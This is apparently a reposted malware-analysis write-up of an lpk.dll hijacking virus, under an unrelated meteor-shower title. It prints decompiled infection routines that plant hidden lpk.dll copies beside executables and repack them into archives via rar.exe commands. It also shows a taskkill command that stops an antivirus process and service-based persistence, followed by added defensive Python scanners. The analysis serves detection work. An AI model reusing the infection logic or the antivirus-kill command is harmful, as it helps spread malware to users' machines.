2004 Perseid meteor shower: pk-class virus analysis
Source: Baidu Wenku  Editor: 偶看新闻  Time: 2024/05/06 11:41:42
Analysis of the lpk class of viruses
Virus sample source: http://www.52pojie.cn/thread-75591-1-1.html
On New Year's Eve I wrote an Lpk of my own and did some research on lpk, so going through this tonight should be a lot easier. For the write-up on lpk, see the notes on my blog; I won't repeat them here.
My Lpk.cpp:
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
Loading Lpk11.dll directly
.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001A32 public DllEntryPoint
.text:10001A32 DllEntryPoint proc near
.text:10001A32
.text:10001A32 hLibModule = dword ptr 4
.text:10001A32 fdwReason = dword ptr 8
.text:10001A32 lpReserved = dword ptr 0Ch
.text:10001A32
.text:10001A32 cmp [esp+fdwReason], 1
.text:10001A37 push esi
.text:10001A38 jnz short loc_10001AA9
.text:10001A3A mov esi, [esp+4+hLibModule]
.text:10001A3E push 104h ; nSize
.text:10001A43 push offset ExistingFileName ; lpFilename
.text:10001A48 push esi ; hModule
.text:10001A49 mov dword_10003290, esi
.text:10001A4F call ds:GetModuleFileNameW
.text:10001A55 push esi ; hLibModule
.text:10001A56 call ds:DisableThreadLibraryCalls
.text:10001A5C call GetMutexName
.text:10001A61 cmp eax, 1
.text:10001A64 jnz short loc_10001AA2
.text:10001A66 call IsVirusKernelFile ; checks whether this copy was dropped by the virus's core process
.text:10001A6B test eax, eax
.text:10001A6D jnz short loc_10001A7D
.text:10001A6F call CreateMutex
.text:10001A74 test eax, eax
.text:10001A76 jnz short loc_10001A7D
.text:10001A78 call ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D ; DllEntryPoint+44j
.text:10001A7D call IsCurrentFileLpk
.text:10001A82 cmp eax, 1
.text:10001A85 jnz short loc_10001AA2
.text:10001A87 push 0 ; lpName
.text:10001A89 push 0 ; bInitialState
.text:10001A8B push eax ; bManualReset
.text:10001A8C push 0 ; lpEventAttributes
.text:10001A8E call ds:CreateEventW
.text:10001A94 mov hHandle, eax
.text:10001A99 test eax, eax
.text:10001A9B jz short loc_10001AA2
.text:10001A9D call StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32j
.text:10001AA2 ; DllEntryPoint+53j ...
.text:10001AA2 call InitLpk
.text:10001AA7 jmp short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------
009119E6 /$ 56 push esi
009119E7 |. 33F6 xor esi, esi
009119E9 |. 56 push esi ; /pThreadId => NULL
009119EA |. 6A 04 push 4 ; |CreationFlags = CREATE_SUSPENDED
009119EC |. 56 push esi ; |pThreadParm => NULL
009119ED |. 68 D3189100 push 009118D3 ; |ThreadFunction = 009118D3
009119F2 |. 56 push esi ; |StackSize => 0
009119F3 |. 56 push esi ; |pSecurity => NULL
009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThread>] ; \CreateThread

009118D3 . 81EC C4000000 sub esp, 0C4
009118D9 . 53 push ebx
009118DA . 55 push ebp
009118DB . 56 push esi
009118DC . 57 push edi
009118DD . 6A 60 push 60 ; /Length = 60 (96.)
009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
009118E3 . 50 push eax ; |Destination
009118E4 . 33FF xor edi, edi ; |
009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMemory>] ; \RtlZeroMemory
009118EC > 6A 02 push 2
009118EE . 5B pop ebx
009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74]
009118F3 . C74424 10 180>mov dword ptr [esp+10], 18
009118FB > 837D 00 01 cmp dword ptr [ebp], 1
009118FF . 74 5B je short 0091195C
00911901 . 53 push ebx
00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ; shell32.DriveType
00911908 . 83C0 FE add eax, -2
0091190B . 83F8 02 cmp eax, 2 ; is this drive type one the virus infects?
0091190E . 77 4C ja short 0091195C
00911910 . 33C0 xor eax, eax
00911912 . 50 push eax ; /pThreadId => NULL
00911913 . 6A 04 push 4 ; |CreationFlags = CREATE_SUSPENDED
00911915 . 53 push ebx ; |pThreadParm
00911916 . 68 77169100 push 00911677 ; |ThreadFunction = 00911677
0091191B . 50 push eax ; |StackSize => 0
0091191C . 50 push eax ; |pSecurity => NULL
0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThread>] ; \CreateThread
A screenshot:
Next, the analysis in IDA
signed int __stdcall Infect(LPCWSTR lpString1)
{
  const WCHAR *v2; // eax@17
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17

  v7 = 1;
  if ( WaitForSingleObject(hHandle, 0) != 258 ) // 258 == WAIT_TIMEOUT: keep going only while the stop event is unsignalled
    return 0;
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    lstrcpyW(&String2, L"A:\\"); // small values are drive indices, not string pointers
    String2 += (unsigned __int16)lpString1;
  }
  lstrcpyW(&FileName, &String2);
  PathAppendW(&String2, &word_10002374);
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )
    return 1;
  lstrcpyW(&String2, &FileName);
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") )
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 ) // FILE_ATTRIBUTE_DIRECTORY
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") ) // if the directory holds an exe, copy lpk.dll in next to it
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 )
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1);
        SetFileAttributesW(&FileName, 7u); // READONLY | HIDDEN | SYSTEM
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// archive infection path
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 ) // 50 MiB
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }
    // ... the rest of the loop (LABEL_27 and the FindNextFileW call) is cut off in the original post
DWORD __cdecl InfectCompressFile(int a1)
{
  DWORD result; // eax@1
  wchar_t v2[2]; // eax@3
  UINT v3; // eax@6
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6
  WCHAR PathName; // [sp+410h] [bp-414h]@6
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
  int v8; // [sp+820h] [bp-4h]@1

  v8 = 520;
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, &FileName, &v8);
  if ( !result )
  {
    if ( FileName == 34 ) // leading '"': the registered command is quoted
    {
      lstrcpyW(&FileName, &String2);
      *(_DWORD *)v2 = L"\"";
    }
    else
    {
      *(_DWORD *)v2 = L" ";
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0;
      PathRemoveFileSpecW(&FileName);
      PathAppendW(&FileName, L"rar.exe"); // the command-line rar.exe that ships with WinRAR
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )
      {
        PathGetShortPath(&FileName);
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
          &FileName,
          a1,
          &PathName);
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )
        {
          wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u);
          Infect(&PathName);
          wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName, &PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u);
          wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}
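The two decompiled routines above spell out the infection footprint: a copy of the malicious lpk.dll lands in every directory that holds an .exe and is given attribute value 7 (READONLY|HIDDEN|SYSTEM), and every .rar or .zip smaller than 0x3200000 bytes has an lpk.dll repacked into it beside the archived .exe. The Python scanner below is an added example of a defender's hunt for those artefacts; it is not code from the original post. It walks a directory tree, reports lpk.dll copies that sit next to executables, checks the file attributes where the platform exposes them, optionally compares the hash against a known-good system lpk.dll (the caller supplies that hash), and lists zip archives that bundle an lpk.dll. The tree built by build_sample_tree() is constructed test data; .rar archives are only flagged for manual inspection because the standard library cannot list them.

```python
import hashlib
import os
import tempfile
import zipfile

# Attribute value the virus applies with SetFileAttributesW(&FileName, 7u).
FILE_ATTRIBUTE_READONLY = 0x1
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
PLANTED_ATTRS = FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM

# Size ceiling the virus applies before touching an archive (nFileSizeLow < 0x3200000).
ARCHIVE_SIZE_LIMIT = 0x3200000


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_tree(root, good_lpk_sha256=None):
    """Walk root and return (path, reason) findings that match the infector's footprint.

    good_lpk_sha256: hex SHA-256 of the legitimate %SystemRoot%\\System32\\lpk.dll,
    if the caller knows it; any lpk.dll with a different hash is reported.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        lower = {name.lower(): name for name in filenames}
        has_exe = any(name.endswith(".exe") for name in lower)
        if "lpk.dll" in lower:
            path = os.path.join(dirpath, lower["lpk.dll"])
            if has_exe:
                findings.append((path, "lpk.dll planted beside executables"))
            # st_file_attributes only exists on Windows; elsewhere this check is skipped.
            attrs = getattr(os.stat(path), "st_file_attributes", None)
            if attrs is not None and attrs & PLANTED_ATTRS == PLANTED_ATTRS:
                findings.append((path, "attributes READONLY|HIDDEN|SYSTEM"))
            if good_lpk_sha256 and sha256_of(path) != good_lpk_sha256.lower():
                findings.append((path, "hash differs from system lpk.dll"))
        for name in filenames:
            ext = os.path.splitext(name)[1].lower()
            if ext not in (".zip", ".rar"):
                continue
            path = os.path.join(dirpath, name)
            if os.path.getsize(path) >= ARCHIVE_SIZE_LIMIT:
                continue  # outside the size window the virus itself uses
            if ext == ".rar":
                findings.append((path, "rar archive: inspect for lpk.dll manually"))
                continue
            try:
                with zipfile.ZipFile(path) as zf:
                    members = [m.rsplit("/", 1)[-1].lower() for m in zf.namelist()]
            except zipfile.BadZipFile:
                continue
            if "lpk.dll" in members:
                findings.append((path, "archive bundles lpk.dll"))
    return findings


def summarize(findings):
    """Reduce findings to sorted (file name, reason) pairs for reporting."""
    return sorted((os.path.basename(path), reason) for path, reason in findings)


def build_sample_tree():
    """Create a throwaway tree shaped like an infected drive (constructed sample data)."""
    root = tempfile.mkdtemp(prefix="lpk_scan_")
    app = os.path.join(root, "app")
    docs = os.path.join(root, "docs")
    os.makedirs(app)
    os.makedirs(docs)
    with open(os.path.join(app, "tool.exe"), "wb") as fh:
        fh.write(b"MZ placeholder executable")
    with open(os.path.join(app, "lpk.dll"), "wb") as fh:
        fh.write(b"MZ placeholder planted dll")
    with open(os.path.join(docs, "readme.txt"), "w") as fh:
        fh.write("nothing to see here\n")
    with zipfile.ZipFile(os.path.join(docs, "backup.zip"), "w") as zf:
        zf.writestr("tool/tool.exe", b"MZ placeholder executable")
        zf.writestr("tool/lpk.dll", b"MZ placeholder planted dll")
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    for found_path, why in scan_tree(sample):
        print(f"{why:45s} {found_path}")
```

Run it against a real drive root with `scan_tree(r"D:\\", good_lpk_sha256=...)`, where the hash comes from a clean System32 copy; the attribute finding only fires on Windows, and a .rar hit means "open it and look", since the virus relies on rar.exe to repack and the scanner does not.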
Below is the analysis of the core exe that the virus drops
An interesting IAT encryption
Used SOD to allocate a block of memory; a single byte would actually have been enough... too lazy to look for free space, so a little is wasted...
decode
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA
00403600 $ FF05 0000AF00 inc dword ptr [AF0000]
This block of code decrypts the first part of the IAT
00403636 .- FF25 E08D4000 jmp dword ptr [408DE0] ; USER32.LoadIconA
0040363C $ 51 push ecx
0040363D . 52 push edx
0040363E . 68 DC8D4000 push 00408DDC
00403643 .^ E9 E0FFFFFF jmp 00403628
00403648 .- FF25 DC8D4000 jmp dword ptr [408DDC] ; USER32.wsprintfA
0040364E $ 51 push ecx
0040364F . 52 push edx
00403650 . 68 D88D4000 push 00408DD8
00403655 .^ E9 CEFFFFFF jmp 00403628
0040365A .- FF25 D88D4000 jmp dword ptr [408DD8] ; USER32.GetDesktopWindow
00403660 $ 51 push ecx
00403661 . 52 push edx
00403662 . 68 E48D4000 push 00408DE4
00403667 .^ E9 BCFFFFFF jmp 00403628
0040366C .- FF25 E48D4000 jmp dword ptr [408DE4] ; USER32.SetWindowLongA
00403672 $ 51 push ecx
00403673 . 52 push edx
00403674 . 68 D08D4000 push 00408DD0
00403679 .^ E9 AAFFFFFF jmp 00403628
0040367E .- FF25 D08D4000 jmp dword ptr [408DD0] ; USER32.SendMessageA
00403684 $ 51 push ecx
00403685 . 52 push edx
00403686 . 68 CC8D4000 push 00408DCC
0040368B .^ E9 98FFFFFF jmp 00403628
00403690 .- FF25 CC8D4000 jmp dword ptr [408DCC] ; USER32.DrawIcon
00403696 $ 51 push ecx
00403697 . 52 push edx
00403698 . 68 C88D4000 push 00408DC8
0040369D .^ E9 86FFFFFF jmp 00403628
004036A2 .- FF25 C88D4000 jmp dword ptr [408DC8] ; USER32.GetClientRect
004036A8 . 51 push ecx
004036A9 . 52 push edx
004036AA . 68 C48D4000 push 00408DC4
004036AF .^ E9 74FFFFFF jmp 00403628
004036B4 .- FF25 C48D4000 jmp dword ptr [408DC4] ; USER32.GetSystemMetrics
004036BA $ 51 push ecx
004036BB . 52 push edx
004036BC . 68 D48D4000 push 00408DD4
004036C1 .^ E9 62FFFFFF jmp 00403628
004036C6 .- FF25 D48D4000 jmp dword ptr [408DD4] ; USER32.IsIconic
004036CC $ 51 push ecx
004036CD . 52 push edx
004036CE . 68 E88D4000 push 00408DE8
004036D3 .^ E9 50FFFFFF jmp 00403628
004036D8 .- FF25 E88D4000 jmp dword ptr [408DE8] ; USER32.EnableWindow

00408DC4 77D18F9C USER32.GetSystemMetrics
00408DC8 77D2908E USER32.GetClientRect
00408DCC 77D3D06C USER32.DrawIcon
00408DD0 77D2F3C2 USER32.SendMessageA
00408DD4 77D297FF USER32.IsIconic
00408DD8 77D2D1D2 USER32.GetDesktopWindow
00408DDC 77D1A8AD USER32.wsprintfA
00408DE0 77D2E8F6 USER32.LoadIconA
00408DE4 77D2C29D USER32.SetWindowLongA
00408DE8 77D29849 USER32.EnableWindow

004036D3 >^/E9 28FFFFFF jmp 00403600
004036D8 .^|FF25 E88D4000 jmp dword ptr [408DE8] ; ggmqgk.004036CC
004036DE $ |51 push ecx
004036DF . |52 push edx
004036E0 . |68 AC8D4000 push 00408DAC
004036E5 . |E9 00000000 jmp 004036EA
004036EA > |68 98694000 push 00406998
004036EF . |E8 2C020000 call 00403920
004036F4 . |5A pop edx
004036F5 . |59 pop ecx
004036F6 .^\EB DB jmp short 004036D3
004036F8 .- FF25 AC8D4000 jmp dword ptr [408DAC] ; advapi32.DeleteService
004036FE $ 51 push ecx
004036FF . 52 push edx
00403700 . 68 B08D4000 push 00408DB0 ; ASCII "6L躻~i躻"
00403705 .^ E9 E0FFFFFF jmp 004036EA
0040370A .- FF25 B08D4000 jmp dword ptr [408DB0] ; advapi32.OpenServiceA
00403710 $ 51 push ecx
00403711 . 52 push edx
00403712 . 68 B48D4000 push 00408DB4 ; ASCII "~i躻"
00403717 .^ E9 CEFFFFFF jmp 004036EA
0040371C .- FF25 B48D4000 jmp dword ptr [408DB4] ; advapi32.OpenSCManagerA
00403722 $ 51 push ecx
00403723 . 52 push edx
00403724 . 68 A88D4000 push 00408DA8
00403729 .^ E9 BCFFFFFF jmp 004036EA
0040372E .- FF25 A88D4000 jmp dword ptr [408DA8] ; advapi32.RegCloseKey
00403734 $ 51 push ecx
00403735 . 52 push edx
00403736 . 68 A48D4000 push 00408DA4
0040373B .^ E9 AAFFFFFF jmp 004036EA
00403740 .- FF25 A48D4000 jmp dword ptr [408DA4] ; advapi32.RegQueryValueExA
00403746 $ 51 push ecx
00403747 . 52 push edx
00403748 . 68 A08D4000 push 00408DA0
0040374D .^ E9 98FFFFFF jmp 004036EA
00403752 .- FF25 A08D4000 jmp dword ptr [408DA0] ; advapi32.RegOpenKeyExA
00403758 . 51 push ecx
00403759 . 52 push edx
0040375A . 68 9C8D4000 push 00408D9C
0040375F .^ E9 86FFFFFF jmp 004036EA
00403764 .- FF25 9C8D4000 jmp dword ptr [408D9C] ; advapi32.SetServiceStatus
0040376A $ 51 push ecx
0040376B . 52 push edx
0040376C . 68 988D4000 push 00408D98
00403771 .^ E9 74FFFFFF jmp 004036EA
00403776 .- FF25 988D4000 jmp dword ptr [408D98] ; advapi32.RegisterServiceCtrlHandlerA
0040377C $ 51 push ecx
0040377D . 52 push edx
0040377E . 68 948D4000 push 00408D94
00403783 .^ E9 62FFFFFF jmp 004036EA
00403788 .- FF25 948D4000 jmp dword ptr [408D94] ; advapi32.StartServiceCtrlDispatcherA
0040378E $ 51 push ecx
0040378F . 52 push edx
00403790 . 68 908D4000 push 00408D90
00403795 .^ E9 50FFFFFF jmp 004036EA
0040379A .- FF25 908D4000 jmp dword ptr [408D90] ; advapi32.CloseServiceHandle
004037A0 $ 51 push ecx
004037A1 . 52 push edx
004037A2 . 68 8C8D4000 push 00408D8C
004037A7 .^ E9 3EFFFFFF jmp 004036EA
004037AC .- FF25 8C8D4000 jmp dword ptr [408D8C] ; advapi32.RegSetValueExA
004037B2 $ 51 push ecx
004037B3 . 52 push edx
004037B4 . 68 888D4000 push 00408D88
004037B9 .^ E9 2CFFFFFF jmp 004036EA
004037BE .- FF25 888D4000 jmp dword ptr [408D88] ; advapi32.RegOpenKeyA
004037C4 $ 51 push ecx
004037C5 . 52 push edx
004037C6 . 68 808D4000 push 00408D80
004037CB .^ E9 1AFFFFFF jmp 004036EA
004037D0 .- FF25 808D4000 jmp dword ptr [408D80] ; advapi32.StartServiceA
004037D6 $ 51 push ecx
004037D7 . 52 push edx
004037D8 . 68 848D4000 push 00408D84
004037DD .^ E9 08FFFFFF jmp 004036EA
004037E2 .- FF25 848D4000 jmp dword ptr [408D84] ; advapi32.CreateServiceA

00408D80 77DBFB38 advapi32.StartServiceA
00408D84 77E071E9 advapi32.CreateServiceA
00408D88 77DAEFB8 advapi32.RegOpenKeyA
00408D8C 77DAEAD7 advapi32.RegSetValueExA
00408D90 77DB6CC5 advapi32.CloseServiceHandle
00408D94 77E07EB1 advapi32.StartServiceCtrlDispatcherA
00408D98 77DC4E96 advapi32.RegisterServiceCtrlHandlerA
00408D9C 77DC3231 advapi32.SetServiceStatus
00408DA0 77DA7842 advapi32.RegOpenKeyExA
00408DA4 77DA7AAB advapi32.RegQueryValueExA
00408DA8 77DA6C17 advapi32.RegCloseKey
00408DAC 77E07489 advapi32.DeleteService
00408DB0 77DC4C36 advapi32.OpenServiceA
00408DB4 77DC697E advapi32.OpenSCManagerA
Anyone interested can play with it themselves...
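Every stub in the listing has the same shape: push ecx; push edx; push <IAT slot>; jmp <decoder>, and 0Ch bytes after the stub start sits the real thunk, jmp dword ptr [<slot>], that the program's call sites use. The decoder (00403628 for the USER32 group, 004036EA for the advapi32 group) pushes a data pointer and calls 00403920 to fill the slot before control returns to the dispatcher; my reading of the byte string at 00403600 is inc dword ptr [AF0000]; mov eax, [AF0000]; imul eax, eax, 12h; lea eax, [eax+40363C]; jmp eax, i.e. a counter that steps through stubs 12h bytes apart, which matches the stub addresses 0040363C, 0040364E, 00403660 and so on. The pointer table dumped after the stubs gives the slot-to-API mapping once everything is decrypted. The Python below is an added example of the bookkeeping an analyst does when labelling such an obfuscated import table; it is not code from the post. It parses OllyDbg listing lines (a subset of the ones above is embedded as sample input), pairs each stub with its slot and decoder, checks that the thunk at stub+0Ch references the same slot, and resolves the slot through the dumped pointer table. The stub shape and the 0Ch thunk offset are my reading of the listing.

```python
import re

# Subset of the OllyDbg listing above, used as sample input (USER32 and advapi32 stubs).
STUB_LISTING = """\
0040363C $ 51 push ecx
0040363D . 52 push edx
0040363E . 68 DC8D4000 push 00408DDC
00403643 .^ E9 E0FFFFFF jmp 00403628
00403648 .- FF25 DC8D4000 jmp dword ptr [408DDC] ; USER32.wsprintfA
0040364E $ 51 push ecx
0040364F . 52 push edx
00403650 . 68 D88D4000 push 00408DD8
00403655 .^ E9 CEFFFFFF jmp 00403628
0040365A .- FF25 D88D4000 jmp dword ptr [408DD8] ; USER32.GetDesktopWindow
004036FE $ 51 push ecx
004036FF . 52 push edx
00403700 . 68 B08D4000 push 00408DB0
00403705 .^ E9 E0FFFFFF jmp 004036EA
0040370A .- FF25 B08D4000 jmp dword ptr [408DB0] ; advapi32.OpenServiceA
"""

# Pointer table as dumped once the slots are decrypted (subset of the one above).
POINTER_TABLE = """\
00408DB0 77DC4C36 advapi32.OpenServiceA
00408DD8 77D2D1D2 USER32.GetDesktopWindow
00408DDC 77D1A8AD USER32.wsprintfA
"""

MNEMONIC_RE = re.compile(r"[a-z]+")  # OllyDbg prints mnemonics in lower case, opcode bytes in upper case
PUSH_IMM_RE = re.compile(r"push ([0-9A-Fa-f]{8})$")
JMP_IMM_RE = re.compile(r"jmp ([0-9A-Fa-f]{8})$")
THUNK_RE = re.compile(r"jmp dword ptr \[([0-9A-Fa-f]+)\]$")
THUNK_OFFSET = 0xC  # push ecx(1) + push edx(1) + push imm32(5) + jmp rel32(5)


def parse_listing(text):
    """Return [(address, instruction text)] from OllyDbg listing lines, dropping markers, bytes and comments."""
    out = []
    for raw in text.splitlines():
        code = raw.partition(";")[0]
        tokens = code.split()
        if len(tokens) < 3:
            continue
        addr = int(tokens[0], 16)
        i = 1
        # Skip the marker column ($ . .^ .- > ...) and the opcode byte groups.
        while i < len(tokens) and not MNEMONIC_RE.fullmatch(tokens[i]):
            i += 1
        if i == len(tokens):
            continue
        out.append((addr, " ".join(tokens[i:])))
    return out


def parse_pointer_table(text):
    """Map IAT slot address -> (resolved pointer, API name)."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            table[int(parts[0], 16)] = (int(parts[1], 16), parts[2])
    return table


def resolve_stubs(listing_text, pointer_table):
    """Pair every decoder stub with its IAT slot, its decoder and the API the slot resolves to."""
    insns = parse_listing(listing_text)
    by_addr = dict(insns)
    stubs = []
    for k in range(len(insns) - 3):
        addr, first = insns[k]
        second = insns[k + 1][1]
        push_m = PUSH_IMM_RE.fullmatch(insns[k + 2][1])
        jmp_m = JMP_IMM_RE.fullmatch(insns[k + 3][1])
        if not (first == "push ecx" and second == "push edx" and push_m and jmp_m):
            continue
        slot = int(push_m.group(1), 16)
        # The real thunk must sit at stub+0Ch and reference the same slot.
        thunk_m = THUNK_RE.fullmatch(by_addr.get(addr + THUNK_OFFSET, ""))
        thunk_ok = bool(thunk_m) and int(thunk_m.group(1), 16) == slot
        target, api = pointer_table.get(slot, (None, "<unresolved>"))
        stubs.append({
            "stub": addr,
            "slot": slot,
            "decoder": int(jmp_m.group(1), 16),
            "thunk_at": addr + THUNK_OFFSET if thunk_ok else None,
            "api": api,
            "target": target,
        })
    return stubs


if __name__ == "__main__":
    for s in resolve_stubs(STUB_LISTING, parse_pointer_table(POINTER_TABLE)):
        print(f"stub {s['stub']:08X} slot {s['slot']:08X} decoder {s['decoder']:08X} -> {s['api']}")
```

Feeding the complete listing and both pointer tables produces one row per import, which is exactly the rename list you need to turn `call 00403648` into `call wsprintfA` in the disassembler; a row whose thunk_at is None means the stub shape differs and deserves a manual look.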
.text:004029E0 ; =============== S U B R O U T I N E =======================================
.text:004029E0
.text:004029E0 ; Attributes: bp-based frame
.text:004029E0
.text:004029E0 OnInit proc near ; DATA XREF: .rdata:00406474o
.text:004029E0
.text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004029E0 var_8 = dword ptr -8
.text:004029E0 var_4 = dword ptr -4
.text:004029E0
.text:004029E0 push ebp
.text:004029E1 ; 8: v1 = this;
.text:004029E1 mov ebp, esp
.text:004029E3 sub esp, 10h
.text:004029E6 push esi
.text:004029E7 push edi
.text:004029E8 mov esi, ecx
.text:004029EA ; 9: CDialog__OnInitDialog();
.text:004029EA call ?OnInitDialog@CDialog@@UAEHXZ ; CDialog::OnInitDialog(void)
.text:004029EF ; 10: SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24));
.text:004029EF mov eax, [esi+60h]
.text:004029F2 mov ecx, [esi+20h]
.text:004029F5 mov edi, SendMessageA
.text:004029FB push eax ; lParam
.text:004029FC push 1 ; wParam
.text:004029FE push 80h ; Msg
.text:00402A03 push ecx ; hWnd
.text:00402A04 call edi ; SendMessageA
.text:00402A06 ; 11: SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24));
.text:00402A06 mov edx, [esi+60h]
.text:00402A09 mov eax, [esi+20h]
.text:00402A0C push edx ; lParam
.text:00402A0D push 0 ; wParam
.text:00402A0F push 80h ; Msg
.text:00402A14 push eax ; hWnd
.text:00402A15 call edi ; SendMessageA
.text:00402A17 ; 12: if ( v1 )
.text:00402A17 test esi, esi
.text:00402A19 jnz short loc_402A1F
.text:00402A1B ; 15: v2 = 0;
.text:00402A1B xor eax, eax
.text:00402A1D jmp short loc_402A22
.text:00402A1F ; ---------------------------------------------------------------------------
.text:00402A1F ; 13: v2 = (HWND)*((_DWORD *)v1 + 8);
.text:00402A1F
.text:00402A1F loc_402A1F: ; CODE XREF: OnInit+39j
.text:00402A1F mov eax, [esi+20h]
.text:00402A22 ; 16: SetWindowLongA(v2, -20, 128);
.text:00402A22
.text:00402A22 loc_402A22: ; CODE XREF: OnInit+3Dj
.text:00402A22 push 80h ; dwNewLong
.text:00402A27 push 0FFFFFFECh ; nIndex
.text:00402A29 push eax ; hWnd
.text:00402A2A call SetWindowLongA
.text:00402A30 ; 17: CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1);
.text:00402A30 push 1
.text:00402A32 push 0
.text:00402A34 push 0
.text:00402A36 push 0FFFFFF9Ch
.text:00402A38 push 0FFFFFF9Ch
.text:00402A3A push 0
.text:00402A3C mov ecx, esi
.text:00402A3E call ?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z ; CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
.text:00402A43 ; 18: WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0);// - - it can really be killed this way? The author must have shit for brains...
.text:00402A43 nop
.text:00402A44 nop
.text:00402A45 nop
.text:00402A46 nop
.text:00402A47 nop
.text:00402A48 nop
.text:00402A49 nop
.text:00402A4A nop
.text:00402A4B nop
.text:00402A4C nop
.text:00402A4D nop
.text:00402A4E nop
.text:00402A4F nop
.text:00402A50 nop
.text:00402A51 nop
.text:00402A52 nop
.text:00402A53 nop
.text:00402A54 nop
.text:00402A55 nop
.text:00402A56 push 0 ; uCmdShow
.text:00402A58 push offset CmdLine ; "taskkill /f /im ZhuDongFangYu.exe /t"
.text:00402A5D call ds:WinExec
.text:00402A63 ; 19: if ( RegOpenKey() )
.text:00402A63 call RegOpenKey
.text:00402A68 pop edi
.text:00402A69 pop esi
.text:00402A6A test eax, eax
.text:00402A6C jz short loc_402A9D
.text:00402A6E ; 21: ServiceStartTable.lpServiceName = "Distribuvbf";
.text:00402A6E lea ecx, [ebp+ServiceStartTable]
.text:00402A71 mov [ebp+ServiceStartTable.lpServiceName], offset ServiceName ; "Distribuvbf"
.text:00402A78 ; 22: ServiceStartTable.lpServiceProc = (LPSERVICE_MAIN_FUNCTIONA)sub_402730;
.text:00402A78 push ecx ; lpServiceStartTable
.text:00402A79 mov [ebp+ServiceStartTable.lpServiceProc], offset sub_402730
.text:00402A80 ; 23: v5 = 0;
.text:00402A80 mov [ebp+var_8], 0
.text:00402A87 ; 24: v6 = 0;
